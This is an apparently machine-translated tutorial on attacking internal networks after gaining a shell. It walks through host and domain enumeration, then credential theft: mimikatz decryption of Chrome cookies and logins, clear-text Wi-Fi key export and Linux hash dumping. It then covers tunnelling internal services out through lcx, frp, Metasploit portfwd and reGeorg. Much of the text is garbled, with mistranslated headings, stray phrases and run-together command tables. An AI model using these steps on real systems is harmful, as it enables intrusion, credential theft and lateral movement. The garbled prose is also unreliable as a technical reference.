External networks and internal networks usually use web vulnerabilities to obtain shells

A large part of the information collection of intranet revolves around the network topology diagram. You can find it by social work operation and maintenance or google.

Intranet diffusion information collection

Overview

Intranet information collection intranet network terminal information: topology, partition intranet core business information oa system, mail server, monitoring system. Other Windows and Linux host information collection, the better the intranet information collection, the faster the call is

Common methods to actively scan. Commonly used tools : analysis of intranet topology architecture for common ports and services such as nmap, netdiscover, nc, masscan, self-written scripts. For example, commands such as dmz, test network, etc. collect native information, and the traffic of nmap is very large. Because nmap uses many ways to scan, the accuracy is high and the traffic is high, so external networks can use it

Active scanning leaves many traces and is difficult to understand. Passive scanning takes a long time. Scan according to the situation

Generally, you should scan port 80 first, etc. Because external websites may be very good, intranet websites are bad, and web vulnerabilities such as sql injection and xss are one by one.

Active scanning

ping command to scan the surviving host in the intranet Advantages : is convenient, generally does not cause alarm disadvantages of traffic detection equipment: slow scanning speed, open the target with firewall, the result will be inaccurate nmap scan the surviving host (icmp scan) nmap -sn -PE -n -v -oN 1.txt Target IP parameters: -sn does not perform port scanning; -PE does icmp echo scan; -n does not perform reverse analysis; -v output debugging information; -oN output nmap scan to scan the surviving host (arp scan) nmap -sn -PR -n -v Target IP parameters: -PR represents arp scan, in the intranet the fastest arp scan speed and high accuracy use netdiscover scan (arp scanning tool, which can be active scanning or passive sniffing) netdiscover -i eth0 -r Target IP Parameter description :-i: specifies an interface; -r: Specify the scan range Note : The longer the netdiscover time, the more accurate it is. You can find that a certain host has intervened in those network segments for a period of time, and thus discover other new network segment addresses. Use the nbtscan tool to quickly scan the surviving PC terminals, and at the same time obtain NETBIOS (windows up input and output service, port 139) nbtscan -r Target IP

Port and Service Scan

Detect the target open port nmap detection: nmap -Pn -n Target IP (ping scan is disabled) masscan scan: masscan -p port number Target IP address --rate=10000#Scan the port with 10kpps speed Detect the target operating system using NSE script :nmap --script smb-os-discovery.nse -p 445 Target IP address : smb-os-discovery.nse script uses smb to detect operating system version, computer name, workgroup name, domain name, etc. --script Specify script Use nmap -O to detect operating system version nmap -O Target IP scan the CVE vulnerability of the host nmap --script=vuln Target IP

Common commands for intranet

Command description net user native user list net view query machine list in the same domain net localgroup administrators view local administrators view native administrators user /domain query domain user net group /domain query workgroup in the domain net group 'domain admins"/domain query domain administrator user group net localgroup administrators /domain login to local domain net localgroup administrators workgroup \user /add domain user to the native net group 'Domain controllers' view domain control/domain is domain penetration parameters. Domain management has a machine with high permissions. After taking it down, the server that can control the entire domain is called domain control.

dsquery domain command (write domain penetration later) command function dsquery computer domainroot -limit 65535 net group 'domain computers'/domain lists all machine names in the domain dsquery user domainroot -limit 65535 net user /domain lists all user names in the domain dsquery subnet lists network segment divisions dsquery group net group /domain lists groups in the domain dsquery ou lists organizational units in the domain dsquery server net time /domain lists controllers in the domain

Winter host information collection

Here is the information collection after obtaining the highest permissions.

Mainly collect content system administrator password (hash-plain text) session of other users, 3389, IPC connection records, and the collection of browser passwords and cookies for each user recycling bin information. Get windows wireless password to get database password to get host files, dns cache information antivirus software, patches, processes, network proxy information sharing folders, web server configuration files and other planned tasks, account password policy, locking policy

Winters various information collection

Tools: mimikatz, wce, getpass, quarkspwdump, reg-sam, pwdump7 and other cmdkeys are used to save username and password credentials. cmdkey /list view credential location netpass.exe obtain password Recycle bin information obtain entry into the recycling bin folder cd C:$RECYCLE.BIN (This folder is a hidden folder, dir /ah view content, a specified attribute h means hidden) Get wireless password netsh wlan export profile interface=WLAN key=clear folder=C:\Get the browser's cookie and storage password (chrome)%localappdata%\google\chrome\USERDATA\default\cookies%localappdata%\googlelchrome\USERDATA\default\LoginDatachrome's user information is saved in the local file. It is a SQLite database format. Use mimikatz to read content.mimikatz.exe privilege:debug log 'dpapi:chrome /in:%localappdata%google\chrome\USERDATA\default\cookies /unprotect'

Windows information collection under msf

The module uses post/windows/gather/forensics/enum_drives to obtain the disk partition status of the target host post/windows/gather/checkvm to determine whether the target host is a virtual machine post/windows/gather/enum_services to view the enabled services post/windows/gather/enum_applications to view the installed applications post/windows/gather/enum_shares to view shared post/windows/gather/dumplinks to view the recent operations of the target host post/windows/gather/enum_patches to view patch information scraper exports multiple information use or run module, and after setting parameters, expoilt

linux information collection

Linux information collection content is much less than Windows

The history command is used to display historical execution commands. It can display 1,000 commands executed by the current user on the local computer. See more variable values for customizing HISTSIZE in /etc/profile file. Using the history -c command will clear the history of all commands. Each user's history is different last command to view all recent login records in the system. When executing the last command, the file /var/log/wtmp will be read. Username Terminal location Login IP or kernel Start time End time If it is a system vulnerability to increase authority, it does not belong to login, no record arp -vn clustering checks whether there is an arp address beyond the same group of services. Mac address corresponds to IP fixed, if Mac does not correspond to IP, it is arp spoofing /etc/hosts file storage domain name/hostname to IP mapping relationship

Linux Collection under msf

The module uses post/linux/gather/checkvm to determine whether the target host is a virtual machine post/linux/gather/enum_configs to view configuration information post/linux/gather/enum_network to view network post/linux/gather/enum_protections to view shared post/linux/gather/enum_system to view system and user information post/linux/gather/enum_users_histroy to view the recent operation of the target host post/linux/gather/hashdump to obtain the hash of linux, but I still want to emphasize that passive collection is important, and passive collection in intranet is much safer, but the cycle is very long. One point of initiative, one point of danger

Summary of collection content

Network card information, arp cache, routing cache, website configuration files, database, access log, browser history, netstat, hosts file, history, hash, plaintext password, website configuration account password, wifi, cmdkey

Intranet forwarding

The purpose of intranet forwarding. In theory, computers connected to the network can access each other, but they have not been implemented due to technical reasons. If a computer in a LAN only opens web services, it can only be used in the intranet and cannot be directly accessed by the external network. To allow external network users to directly access LAN services, intranet forwarding and other operations must be carried out

Intranet forwarding principle

Transfer through the server, map the internal port to the public IP, or forward the intranet port to the external server. Three forms of port forwarding intranet forwarding are used by the target machine to restrict access to a certain port. You can forward the port of this machine or the port of any host that this machine can access to to any public IP you need to access.

Port mapping maps a port that cannot be accessed by the intranet to a port on the public network, thereby conducting an attack. For example, port :3389

Proxy forwarding is mainly used to serve as a springboard on the target machine, which can then attack the intranet.

Four basic network situations: Attackers have independent external network IPs, and the servers that get shells also have independent external network IPs. Attackers have independent external network IPs. The servers that get shells are in the intranet, and only a few mapped ports attackers are in the intranet, and the servers are in the intranet. There are only a few mapped ports attackers are in the intranet. There are four situations: There are different ways to get servers.

Port Forwarding

Principle

Port forwarding is the behavior of forwarding a network port from one network node to another. Make an external user from the outside through an activated NAT router to a port on a private internal IP address (inside the LAN).

Simply put: port forwarding is to forward a port (this port can be the port of the native machine or the port of any host that can be accessed by the native machine) to any IP that can be accessed. Usually this IP is a public IP port forwarding scenario:

The external network host A can already connect to the port on the intranet host B at any time, but cannot access the port on the intranet host C.

At this time, the port of the C host can be forwarded to the port of the B host. Then, the external network host A accesses a certain port of the B host, which is equivalent to accessing a certain port of the C host.

Port Forwarding Tool

lcx

lcx is a port forwarding tool that resides in socket implementation. It has two versions: Windows and Linux. It is called lcx.exe and Linux is called portmap.

A normal socket tunnel must have two ends: server and client

West of windows:

Forwarding port: lcx.exe -slave Public IP Port Intranet IP Port Monitoring Port: lcx.exe -listen Forwarding port, there is no port mapping port in this machine that is not occupied: lcx.exe -tran Mapping port number ip Target port Local port mapping : If the target server is restricted by the firewall, the data of some ports cannot pass through the firewall, the data of the corresponding port of the target server can be transmitted to other ports allowed by the firewall lcx.exe -tran Mapping port number Target ip Target port Intranet port forwarding: When the following rules are as follows, the host cannot directly access the intranet. At this time, the web server needs to be used as a springboard, that is, the proxy to enable the attacking machine to access the intranet host

Basic commands:

马云惹不起马云Forwarding port lcx.exe -slave Public IP port Intranet IP port

马云惹不起马云 Listen port lcx.exe -listen forwarding port No occupied port of this machine windows port forwarding instance

Environment: The intranet host cannot access the external network, but can access the intranet machines of the same network segment. At the same time, port 80 can only be accessed locally, but port 8080 is open to the public.

Step 1 : port 80 of the controlled server forwards to the local port 8080 lcx -tran 8080 127.0.0.1 80

Step 2: Connect to the server controlled by the intranet that can be accessed externally by the intranet lcx -slave 192.168.56.1 4444 192.168.56.101 8080

Step 3: Listen to the port lcx on an intranet machine that can be accessed externally -listen 4444 12345

Step 4: The external network machine accesses port 12345 of 192.168.56.1, that is, accesses 192.168.64.103:12345 from server 12345-server 4444-outer network 80-intranet 80 on external network 192.168.64.230

Linux:

Usage :/portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]

v:version

-m: specifies method action parameters

method=1: Listen to port 2 (port map) of port 1 connected to host 2 (port map)

method=2: Listen to Port1 forwarding to port2

method=3: Connect the port corresponding to host 1 and the port corresponding to host 2 (port forwarding)

For example,/portmap -m 2 -p1 6666 -h2 Public ip -p2 7777//Listen to requests from port 6666 and forward to 7777

frp

FRP (fast reverse proxy) is a reverse proxy application developed in Go language. It can perform intranet penetration FRP support tcp\udp\http\httpsfrp

Using machines located in the intranet or firewall, we provide http\https\tcp\udp service to the external network. For http, https service supports domain name-based virtual hosts and supports custom domain names. Multiple domain names share a 80-port downloaded frps, frps.ini is the server program and configuration file, frpc, frpc.ini is the client program and configuration file.

Server settings and modification frp.ini

File format:

[common]

bind_port=7000 #frp server listening 㐰

dashboard_port=7500 #web background listening port

dashboard_user=admin #web background username and password

dashboard_pwd=admin

token=123456 #The connection password between the client and the server runs frps server side./frps -c frps.ini#-c means loading the configuration file

Visit x.x.x.x:7500 and log in with your own username and password

Client settings modify frpc.ini file

[common]

server_addr=192.168.152.217

#Server IP address

server_port=7000

#Server Port

token=123456

#Connection password set on the server

[http]

#Custom rules, [xxx] represents the rule name

type=tcp

#type: Forwarding Protocol Type

local_ip=127.0.0.1

local_port=3389

#Port number of local application

remote_port=7001

# After this rule is configured on the port number open to the server, complete frp.ini, cmd runs frpc (same as the server-c specifies the configuration file)

Connect to the remote_port port of the server on the client outside the LAN

This tool can connect to Linux across platforms, that is, Windows exe programs

The above operation is equivalent to listening 7000 to 7001 and then connecting

metasploit portfwd

Introduction

A tool built into the meterpreter shell that directly accesses machines that are inaccessible to the attack system. Run this command on a damaged host that can access the attack machine and the target machine. You can forward the TCP connection through the local machine and become a fulcrum. Options

-L: The local host to be monitored (optional).

-l : The local port to be listened to, the connection to this port will be forwarded to the remote system.

-p: The remote port to which the TCP connection will forward the port to which the TCP connection will be connected

-r: The IP address of the remote host to be connected to

parameter

Add : This parameter is used to create forwarding portfwd add -I local listening port number -p target port number -r target machine IP address

Delete : This will delete the previous entry from the forwarding port list.portfwd delete -I Local listening port number -p Destination port number -r Destination machine IP address

List : lists all ports currently forwarded portfwd list

Flush : This will delete all ports in the forwarding list

This is not very stable, not as good as frp, lcx is not very useful.

Proxy category: HTTP proxy, socks proxy, telnet proxy, ssl proxy

Proxy tools: EarthWorm, reGeorg (http proxy), proxifier (win), sockscap64 (win), proxychains (linux)

The intranet is connected to the external network through a proxy as a forward proxy, and the intranet is connected to the intranet through a proxy as a reverse proxy.

Load balancing server: Distribute user's requests to an idle server.

socks proxy

When accessing a website through a proxy server, the socks server acts as an intermediary, communicates with both parties respectively and informs the other party of the result. As long as the socks proxy is configured, there is no need to specify the accessed target.

Socks and http agents use tcp traffic, which means that the UDP protocol cannot use these two proxy proxy and port forwarding: proxy port forwarding requires Socks protocol support without the need for one-to-many protocol, accessing the network one-to-one, and helping others access a certain port, socks proxy can be understood as lcx port forwarding. It listens to a service port on the server. When there is a connection request, it will parse the target port accessing the target URL from the socks protocol.

The meaning is that if there is an agent, there is no need for his mother port forwarding. He also makes his mind dizzy after turning the port around and turning it around. The agent does not need so many fancy ones.

proxychains

proxychains is an open source proxy tool that can be proxied globally under Linux. proxychains force connection to specified applications through a user-defined proxy list, supporting the http\socks4\socks5 type. Before using the tool, you must configure the tool. Configuration file :/etc/proxychains.conf

Delete the dynamic_chain comment

Add proxy server proxychains at the bottom. The software name is used to start any software with the proxy.

regeorg tool

regeorg mainly forwards the intranet server port to the local machine through the http/https tunnel, forming a loop for the target server to connect to the target server on the intranet or when a port policy is made. The internal open port of the target server is used to establish a socks proxy for intranet penetration. The server must support a regeorg in aspx\php\jsp divided into server and client. There are many kinds of servers, such as php\aspx\jsp\node.js, and the client is python, so when using it, find the corresponding script in the file.

regeorg use

and use it in combination with proxychains.

pip install installation assuming that the server is php version, upload the php in regeorg to the server, directly access the 'georg says,'all seems fine'', to run :python reGeorgSocksProxy.py -u target machine reGeorg script address -p local listening port and another terminal to modify the proxychains.conf configuration file, delete the dynamic_chain annotation, add a line to the ProxyList socks5 127.0.0.1 local listening port, and add other comments